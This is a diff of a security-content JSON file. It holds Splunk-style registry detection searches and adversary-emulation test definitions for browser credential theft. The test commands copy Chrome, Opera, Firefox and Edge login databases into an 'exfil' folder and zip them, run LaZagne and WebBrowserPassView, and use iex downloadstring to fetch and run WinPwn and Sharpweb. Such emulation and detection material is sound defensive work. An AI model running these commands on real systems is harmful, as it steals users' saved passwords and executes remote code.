take effect. This windows feature may implement by administrator in some server where shutdown is critical. In that scenario filter of machine and users that can modify this registry is needed.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon\" Registry.registry_value_data = \"0x00000000\") OR (Registry.registry_path=\"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose\" Registry.registry_value_data = \"0x00000001\")) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_shutdown_button_through_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon\" Registry.registry_value_data = \"0x00000000\") OR (Registry.registry_path=\"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose\" Registry.registry_value_data = \"0x00000001\")) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_shutdown_button_through_registry_filter`", "tags": { "name": "Windows Disable Shutdown Button Through Registry", "analytic_story": [ @@ -317122,7 +319958,7 @@ { "name": "Windows Disable Windows Group Policy Features Through Registry", "description": "This analytic is to detect a suspicious registry modification to disable windows features. These techniques are seen in several ransomware malware to impair the compromised host to make it hard for analyst to mitigate or response from the attack. Disabling these known features make the analysis and forensic response more hard. Disabling these feature is not so common but can still be implemented by the administrator for security purposes. In this scenario filters for users that are allowed doing this is needed.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\*\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\*\" Registry.registry_value_name IN (\"NoDesktop\", \"NoFind\", \"NoControlPanel\", \"NoFileMenu\", \"NoSetTaskbar\", \"NoTrayContextMenu\", \"TaskbarLockAll\", \"NoThemesTab\",\"NoPropertiesMyDocuments\",\"NoVisualStyleChoice\",\"NoColorChoice\",\"NoPropertiesMyDocuments\") Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_windows_group_policy_features_through_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\*\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\*\" Registry.registry_value_name IN (\"NoDesktop\", \"NoFind\", \"NoControlPanel\", \"NoFileMenu\", \"NoSetTaskbar\", \"NoTrayContextMenu\", \"TaskbarLockAll\", \"NoThemesTab\",\"NoPropertiesMyDocuments\",\"NoVisualStyleChoice\",\"NoColorChoice\",\"NoPropertiesMyDocuments\") Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_disable_windows_group_policy_features_through_registry_filter`", "tags": { "name": "Windows Disable Windows Group Policy Features Through Registry", "analytic_story": [ @@ -317137,7 +319973,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "Registry modification to disable windows features on $dest$", + "message": "Registry modification to disable windows group policy features on $dest$", "mitre_attack_id": [ "T1112" ], @@ -317192,7 +320028,7 @@ { "name": "Windows Hide Notification Features Through Registry", "description": "This analytic is to detect a suspicious registry modification to hide common windows notification feature from compromised host. This technique was seen in some ransomware family to add more impact to its payload that are visually seen by user aside from the encrypted files and ransomware notes. Even this a good anomaly detection, administrator may implement this changes for auditing or security reason. In this scenario filter is needed.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\*\" Registry.registry_value_name IN (\"HideClock\", \"HideSCAHealth\", \"HideSCANetwork\", \"HideSCAPower\", \"HideSCAVolume\") Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_hide_notification_features_through_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\*\" Registry.registry_value_name IN (\"HideClock\", \"HideSCAHealth\", \"HideSCANetwork\", \"HideSCAPower\", \"HideSCAVolume\") Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_hide_notification_features_through_registry_filter`", "tags": { "name": "Windows Hide Notification Features Through Registry", "analytic_story": [ @@ -318097,6 +320933,74 @@ ] } }, + { + "name": "Windows Modify Registry MaxConnectionPerServer", + "description": "The following analytic identifies a suspicious registry modification of Windows max connection per server configuration. This particular technique has been observed in various threat actors, adversaries, and even in malware such as the Warzone (Ave Maria) RAT. By altering the max connection per server setting in the Windows registry, attackers can potentially increase the number of concurrent connections allowed to a remote server. This modification could be exploited for various malicious purposes, including facilitating distributed denial-of-service (DDoS) attacks or enabling more effective lateral movement within a compromised network.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\MaxConnectionsPerServer*\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\MaxConnectionsPer1_0Server*\") Registry.registry_value_data = \"0x0000000a\" by Registry.registry_key_name Registry.user Registry.registry_path Registry.registry_value_data Registry.action Registry.dest | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_modify_registry_maxconnectionperserver_filter`", + "tags": { + "name": "Windows Modify Registry MaxConnectionPerServer", + "analytic_story": [ + "Warzone RAT" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "A registry modification in max connection per server configuration in $dest$", + "mitre_attack_id": [ + "T1112" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "dest", + "type": "Endpoint", + "role": [ + "Victim" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1112", + "mitre_attack_technique": "Modify Registry", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "APT19", + "APT32", + "APT38", + "APT41", + "Blue Mockingbird", + "Dragonfly", + "Earth Lusca", + "Ember Bear", + "FIN8", + "Gamaredon Group", + "Gorgon Group", + "Kimsuky", + "LuminousMoth", + "Magic Hound", + "Patchwork", + "Silence", + "TA505", + "Threat Group-3390", + "Turla", + "Wizard Spider" + ] + } + ] + } + }, { "name": "Windows Modify Registry No Auto Reboot With Logon User", "description": "The following analytic identifies a suspicious registry modification of Windows auto update configuration. This technique was being abused by several adversaries, malware authors and also red-teamers to bypass detection or to be able to compromise the target host with zero day exploit or as an additional defense evasion technique. RedLine Stealer is one of the malware we've seen that uses this technique to evade detection and add more payload on the target host. This detection looks for registry modification that will allow \"Logged-on user gets to choose whether or not to restart his or her compute\".", @@ -318391,7 +321295,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An increase of Windows Modify Registry behavior has been detected on $affected_systems$", + "message": "An increase of Windows Modify Registry behavior has been detected on $risk_object$", "mitre_attack_id": [ "T1112" ], @@ -318400,7 +321304,7 @@ ], "observable": [ { - "name": "affected_systems", + "name": "risk_object", "type": "Hostname", "role": [ "Victim" @@ -318857,7 +321761,7 @@ { "name": "Windows Modify Show Compress Color And Info Tip Registry", "description": "This analytic is to look for suspicious registry modification related to file compression color and information tips. This IOC was seen in hermetic wiper where it has a thread that will create this registry entry to change the color of compressed or encrypted files in NTFS file system as well as the pop up information tips. This is a good indicator that a process tries to modified one of the registry GlobalFolderOptions related to file compression attribution in terms of color in NTFS file system.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced*\" AND Registry.registry_value_name IN(\"ShowCompColor\", \"ShowInfoTip\")) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_modify_show_compress_color_and_info_tip_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced*\" AND Registry.registry_value_name IN(\"ShowCompColor\", \"ShowInfoTip\")) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_modify_show_compress_color_and_info_tip_registry_filter`", "tags": { "name": "Windows Modify Show Compress Color And Info Tip Registry", "analytic_story": [ @@ -320525,11 +323429,11 @@ "command_list": [ "Set-Location -path \"\\..\\ExternalPayloads\\Sysinternals\";\n./accesschk.exe -accepteula .;\n", "cd ~/Library/Cookies\ngrep -q \"coinbase\" \"Cookies.binarycookies\"\n", - "\\T1555.003\\bin\\LaZagne.exe browsers\n", - "Copy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\" -Destination PathToAtomicsFolder\\..\\ExternalPayloads\nCopy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data For Account\" -Destination PathToAtomicsFolder\\..\\ExternalPayloads\n", - "Copy-Item \"$env:APPDATA\\Opera Software\\Opera Stable\\Login Data\" -Destination PathToAtomicsFolder\\..\\ExternalPayloads\n", - "Copy-Item \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\\" -Destination PathToAtomicsFolder\\..\\ExternalPayloads -Force -Recurse\n", - "Copy-Item \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\" -Destination PathToAtomicsFolder\\..\\ExternalPayloads\\Edge -Force -Recurse\n", + "\"\\T1555.003\\bin\\LaZagne.exe\" browsers\n", + "Copy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\" -Destination \"PathToAtomicsFolder\\..\\ExternalPayloads\"\nCopy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data For Account\" -Destination \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n", + "Copy-Item \"$env:APPDATA\\Opera Software\\Opera Stable\\Login Data\" -Destination \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n", + "Copy-Item \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\\" -Destination \"PathToAtomicsFolder\\..\\ExternalPayloads\" -Force -Recurse\n", + "Copy-Item \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\" -Destination \"PathToAtomicsFolder\\..\\ExternalPayloads\\Edge\" -Force -Recurse\n", "$PasswordDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\ncmd /c \\..\\ExternalPayloads\\Firepwd.py -d $PasswordDBLocation > $env:temp\\T1555.003Test8.txt\ncat $env:temp\\T1555.003Test8.txt\n", "python3 /tmp/LaZagne/Linux/laZagne.py browsers -firefox >> /tmp/firefox_password.txt", "$exfil_folder = \"$env:temp\\T1555.003\"\nif (test-path \"$exfil_folder\") {} else {new-item -path \"$env:temp\" -Name \"T1555.003\" -ItemType \"directory\" -force}\n$FirefoxCredsLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\nif (test-path \"$FirefoxCredsLocation\\key4.db\") {copy-item \"$FirefoxCredsLocation\\key4.db\" -destination \"$exfil_folder\\T1555.003Firefox_key4.db\"} else {}\nif (test-path \"$FirefoxCredsLocation\\logins.json\") {copy-item \"$FirefoxCredsLocation\\logins.json\" -destination \"$exfil_folder\\T1555.003Firefox_logins.json\"} else {}\nif (test-path \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data\") {copy-item \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data\" -destination \"$exfil_folder\\T1555.003Chrome_Login Data\"} else {}\nif (test-path \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data For Account\") {copy-item \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data For Account\" -destination \"$exfil_folder\\T1555.003Chrome_Login Data For Account\"} else {}\nif (test-path \"$env:appdata\\Opera Software\\Opera Stable\\Login Data\") {copy-item \"$env:appdata\\Opera Software\\Opera Stable\\Login Data\" -destination \"$exfil_folder\\T1555.003Opera_Login Data\"} else {}\nif (test-path \"$env:localappdata/Microsoft/Edge/User Data/Default/Login Data\") {copy-item \"$env:localappdata/Microsoft/Edge/User Data/Default/Login Data\" -destination \"$exfil_folder\\T1555.003Edge_Login Data\"} else {} \ncompress-archive -path \"$exfil_folder\" -destinationpath \"$exfil_folder.zip\" -force\n", @@ -320537,7 +323441,7 @@ "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nkittenz -consoleoutput -noninteractive", "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Sharpweb.ps1')\nInvoke-Sharpweb -command \"all\"", "cp ~/Library/\"Application Support/Google/Chrome/Default/Login Data\" \"/tmp/T1555.003_Login Data\"\ncp ~/Library/\"Application Support/Google/Chrome/Default/Login Data For Account\" \"/tmp/T1555.003_Login Data For Account\"\n", - "Start-Process \\T1555.003\\bin\\WebBrowserPassView.exe\nStart-Sleep -Second 4\nStop-Process -Name \"WebBrowserPassView\"\n", + "Start-Process \"\\T1555.003\\bin\\WebBrowserPassView.exe\"\nStart-Sleep -Second 4\nStop-Process -Name \"WebBrowserPassView\"\n", "Copy-Item \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data\" -Destination \"PathToAtomicsFolder\\..\\ExternalPayloads\" > $null\nRemove-Item \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data\" > $null\nCopy-Item \"$env:PathToAtomicsFolder\\T1555.003\\src\\Login Data\" -Destination \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\\" > $null\ncd \"$env:PathToAtomicsFolder\\T1555.003\\bin\"\n.\\BrowserCollector.exe\n" ], "commands": [], @@ -320568,13 +323472,13 @@ "dependencies": [ { "description": "Modified Sysinternals must be located at #{file_path}\n", - "prereq_command": "if (Test-Path #{file_path}\\SysInternals) {exit 0} else {exit 1}\n", - "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \"https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip\" -OutFile \"#{file_path}\\Modified-SysInternalsSuite.zip\"\nExpand-Archive #{file_path}\\Modified-SysInternalsSuite.zip #{file_path}\\sysinternals -Force\nRemove-Item #{file_path}\\Modified-SysInternalsSuite.zip -Force\n" + "prereq_command": "if (Test-Path \"#{file_path}\\SysInternals\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \"https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip\" -OutFile \"#{file_path}\\Modified-SysInternalsSuite.zip\"\nExpand-Archive \"#{file_path}\\Modified-SysInternalsSuite.zip\" \"#{file_path}\\sysinternals\" -Force\nRemove-Item \"#{file_path}\\Modified-SysInternalsSuite.zip\" -Force\n" } ], "executor": { "command": "Set-Location -path \"#{file_path}\\Sysinternals\";\n./accesschk.exe -accepteula .;\n", - "cleanup_command": "Remove-Item #{file_path}\\Sysinternals -Force -Recurse -ErrorAction Ignore\n", + "cleanup_command": "Remove-Item \"#{file_path}\\Sysinternals\" -Force -Recurse -ErrorAction Ignore\n", "name": "powershell" } }, @@ -320615,14 +323519,14 @@ "dependencies": [ { "description": "LaZagne.exe must exist on disk at specified location (#{lazagne_path})\n", - "prereq_command": "if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/AlessandroZ/LaZagne/releases/download/2.4.5/lazagne.exe\" -OutFile \"#{lazagne_path}\"\n" + "prereq_command": "if (Test-Path \"#{lazagne_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{lazagne_path}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe\" -OutFile \"#{lazagne_path}\"\n" } ], "executor": { "name": "command_prompt", "elevation_required": true, - "command": "#{lazagne_path} browsers\n" + "command": "\"#{lazagne_path}\" browsers\n" } }, { @@ -320637,12 +323541,12 @@ { "description": "Chrome must be installed\n", "prereq_command": "if ((Test-Path \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\") -Or (Test-Path \"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\")) {exit 0} else {exit 1}", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\n$installer = \"PathToAtomicsFolder\\..\\ExternalPayloads\\ChromeStandaloneSetup64.msi\"\nInvoke-WebRequest -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi\nmsiexec /i $installer /qn\nStart-Process -FilePath \"chrome.exe\"\nStop-Process -Name \"chrome\"\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\n$installer = \"PathToAtomicsFolder\\..\\ExternalPayloads\\ChromeStandaloneSetup64.msi\"\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ChromeStandaloneSetup64.msi\" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi\nmsiexec /i $installer /qn\nStart-Process -FilePath \"chrome.exe\"\nStop-Process -Name \"chrome\"\n" } ], "executor": { "name": "powershell", - "command": "Copy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\" -Destination PathToAtomicsFolder\\..\\ExternalPayloads\nCopy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data For Account\" -Destination PathToAtomicsFolder\\..\\ExternalPayloads\n", + "command": "Copy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\" -Destination \"PathToAtomicsFolder\\..\\ExternalPayloads\"\nCopy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data For Account\" -Destination \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n", "cleanup_command": "Remove-Item -Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\Login Data\" -Force -ErrorAction Ignore\nRemove-Item -Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\Login Data For Account\" -Force -ErrorAction Ignore\n" } }, @@ -320658,7 +323562,7 @@ { "description": "Opera must be installed\n", "prereq_command": "if (((Test-Path \"$env:LOCALAPPDATA\\Programs\\Opera\\launcher.exe\") -Or (Test-Path \"C:\\Program Files\\Opera\\launcher.exe\") -Or (Test-Path \"C:\\Program Files (x86)\\Opera\\launcher.exe\"))) {exit 0} else {exit 1}", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\n$installer = \"PathToAtomicsFolder\\..\\ExternalPayloads\\OperaStandaloneInstaller.exe\"\nInvoke-WebRequest -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\OperaStandaloneInstaller.exe https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe\nStart-Process $installer -ArgumentList '/install /silent /launchopera=1 /setdefaultbrowser=0'\nStart-Sleep -s 180\nStop-Process -Name \"opera\"\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\n$installer = \"PathToAtomicsFolder\\..\\ExternalPayloads\\OperaStandaloneInstaller.exe\"\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\OperaStandaloneInstaller.exe\" https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe\nStart-Process $installer -ArgumentList '/install /silent /launchopera=1 /setdefaultbrowser=0'\nStart-Sleep -s 180\nStop-Process -Name \"opera\"\n" }, { "description": "Opera login data file must exist\n", @@ -320668,7 +323572,7 @@ ], "executor": { "name": "powershell", - "command": "Copy-Item \"$env:APPDATA\\Opera Software\\Opera Stable\\Login Data\" -Destination PathToAtomicsFolder\\..\\ExternalPayloads\n", + "command": "Copy-Item \"$env:APPDATA\\Opera Software\\Opera Stable\\Login Data\" -Destination \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n", "cleanup_command": "Remove-Item -Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\Login Data\" -Force -ErrorAction Ignore\n" } }, @@ -320694,7 +323598,7 @@ ], "executor": { "name": "powershell", - "command": "Copy-Item \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\\" -Destination PathToAtomicsFolder\\..\\ExternalPayloads -Force -Recurse\n", + "command": "Copy-Item \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\\" -Destination \"PathToAtomicsFolder\\..\\ExternalPayloads\" -Force -Recurse\n", "cleanup_command": "Remove-Item -Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\Profiles\" -Force -ErrorAction Ignore -Recurse\n" } }, @@ -320720,7 +323624,7 @@ ], "executor": { "name": "powershell", - "command": "Copy-Item \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\" -Destination PathToAtomicsFolder\\..\\ExternalPayloads\\Edge -Force -Recurse\n", + "command": "Copy-Item \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\" -Destination \"PathToAtomicsFolder\\..\\ExternalPayloads\\Edge\" -Force -Recurse\n", "cleanup_command": "Remove-Item -Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\Edge\" -Force -ErrorAction Ignore -Recurse\n" } }, @@ -320758,7 +323662,7 @@ { "description": "Firepwd must exist at #{Firepwd_Path}\n", "prereq_command": "if (Test-Path \"#{Firepwd_Path}\") {exit 0} else {exit 1}\n", - "get_prereq_command": "Invoke-WebRequest \"https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py\" -outfile \"#{Firepwd_Path}\"\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\nInvoke-WebRequest \"https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py\" -outfile \"#{Firepwd_Path}\"\n" }, { "description": "Firefox profile directory must be present\n", @@ -320768,17 +323672,17 @@ { "description": "Visual Studio Build Tools command prompt must exist at #{VS_CMD_Path}\n", "prereq_command": "if (Test-Path \"#{VS_CMD_Path}\") {exit 0} else {exit 1}\n", - "get_prereq_command": "invoke-webrequest \"https://aka.ms/vs/17/release/vs_BuildTools.exe\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\VS_BuildTools.exe\"\nwrite-host \"Visual Studio Build Tools (Desktop Development with C++) must be installed manually. Please run the installer from PathToAtomicsFolder\\..\\ExternalPayloads\\VS_BuildTools.exe.\"\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://aka.ms/vs/17/release/vs_BuildTools.exe\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\VS_BuildTools.exe\"\nwrite-host \"Visual Studio Build Tools (Desktop Development with C++) must be installed manually. Please run the installer from PathToAtomicsFolder\\..\\ExternalPayloads\\VS_BuildTools.exe.\"\n" }, { "description": "Python must be installed\n", "prereq_command": "if (Test-Path \"#{Python_Path}\") {exit 0} else {exit 1}\n", - "get_prereq_command": "invoke-webrequest \"https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\python_setup.exe\"\nStart-Process -FilePath PathToAtomicsFolder\\..\\ExternalPayloads\\python_setup.exe -ArgumentList \"/quiet InstallAllUsers=1 PrependPath=1 Include_test=0\" -Wait\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\python_setup.exe\"\nStart-Process -FilePath \"PathToAtomicsFolder\\..\\ExternalPayloads\\python_setup.exe\" -ArgumentList \"/quiet InstallAllUsers=1 PrependPath=1 Include_test=0\" -Wait\n" }, { "description": "Pip must be installed.\n", "prereq_command": "$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable(\"Path\",\"Machine\") + \";\" + [System.Environment]::GetEnvironmentVariable(\"Path\",\"User\"))\nif (pip -v) {exit 0} else {exit 1}\n", - "get_prereq_command": "invoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" }, { "description": "Pycryptodome library must be installed \n", @@ -320922,12 +323826,12 @@ "dependencies": [ { "description": "Check if WebBrowserPassView.exe exists in the specified path #{webbrowserpassview_path}\n", - "prereq_command": "if (Test-Path #{webbrowserpassview_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe -OutFile #{webbrowserpassview_path}\n" + "prereq_command": "if (Test-Path \"#{webbrowserpassview_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item 